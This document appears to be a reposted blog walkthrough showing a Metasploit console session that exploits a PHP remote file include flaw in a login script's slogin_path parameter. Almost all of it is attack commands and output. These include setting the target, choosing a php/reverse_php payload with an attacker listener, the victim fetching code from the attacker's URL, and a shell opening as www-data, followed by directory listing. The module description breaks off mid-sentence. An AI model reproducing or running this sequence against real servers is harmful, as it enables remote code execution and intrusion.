Using the Metasploit PHP Remote File Include Module-About:Blank H4cking-运维网 博客

jackyrar

　　
msf > search php_include
　　

Searching loaded modules for pattern 'php_include'...
　　

　　
Exploits
　　
========
　　

　　
Name Rank Description
　　
---- ---- -----------
　　
unix/webapp/php_include excellent PHP Remote File Include Generic Exploit
　　

　　
msf > use exploit/unix/webapp/php_include
　　
msf exploit(php_include) > info
　　

　　
Name: PHP Remote File Include Generic Exploit
　　
Version: 8762
　　
Platform: PHP
　　
Privileged: No
　　
License: Metasploit Framework License (BSD)
　　
Rank: Excellent
　　

　　
Provided by:
　　
hdm
　　
egypt
　　

　　
Available targets:
　　
Id Name
　　
-- ----
　　
0 Automatic
　　

　　
Basic options:
　　
Name Current Setting Required Description
　　
---- --------------- -------- -----------
　　
PATH / yes The base directory to prepend to the URL to try
　　
PHPRFIDB /home/cg/evil/msf3/dev2/data/exploits/php/rfi-locations.dat no A local file containing a list of URLs to try, with XXpathXX replacing the URL
　　
PHPURI no The URI to request, with the include parameter changed to XXpathXX
　　
Proxies no Use a proxy chain
　　
RHOST yes The target address
　　
RPORT 80 yes The target port
　　
SRVHOST 0.0.0.0 yes The local host to listen on.
　　
SRVPORT 8080 yes The local port to listen on.
　　
SSL false no Negotiate SSL for incoming connections
　　
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
　　
URIPATH no The URI to use for this exploit (default is random)
　　
VHOST no HTTP server virtual host
　　

　　
Payload information:
　　
Space: 32768
　　

　　
Description:
　　
This module can be used to exploit any generic PHP file include
　　
vulnerability, where the application includes code like the
　　
following:
　　

　　
msf exploit(php_include) > set PHPURI /slogin_lib.inc.php?slogin_path=XXpathXX
　　
PHPURI => /slogin_lib.inc.php?slogin_path=XXpathXX
　　
msf exploit(php_include) > set PATH /1/
　　
PATH => /1/
　　
msf exploit(php_include) > set RHOST 192.168.6.68
　　
RHOST => 192.168.6.68
　　
msf exploit(php_include) > set RPORT 8899
　　
RPORT => 8899
　　
msf exploit(php_include) > set PAYLOAD php/reverse_php
　　
PAYLOAD => php/reverse_php
　　
msf exploit(php_include) > set LHOST 192.168.6.140
　　
LHOST => 192.168.6.140
　　
msf exploit(php_include) > exploit
　　

　　

Started bind handler
　　

Using URL: http://192.168.6.140:8080/RvSIqhdft
　　

PHP include server started.
　　

Sending /1/slogin_lib.inc.php?slogin_path=%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%36%2e%31%34%30%3a%38%30
　　
%38%30%2f%52%76%53%49%71%68%64%66%74%3f
　　

Command shell session 1 opened (192.168.6.140:34117 -> 192.168.6.68:8899) at Sun May 09 21:37:26 -0400 2010
　　

　　
dir
　　
0.jpegheader.inc.phplicense.txtslog_users.txt version.txt
　　
1.jpegindex.aspoldslogin.inc.php
　　
adminlog.phpinstall.txtreadme.txtslogin_genpass.php
　　
footer.inc.phplaunch.aspslog_users.phpslogin_lib.inc.php
　　

　　
id uid=33(www-data) gid=33(www-data) groups=33(www-data)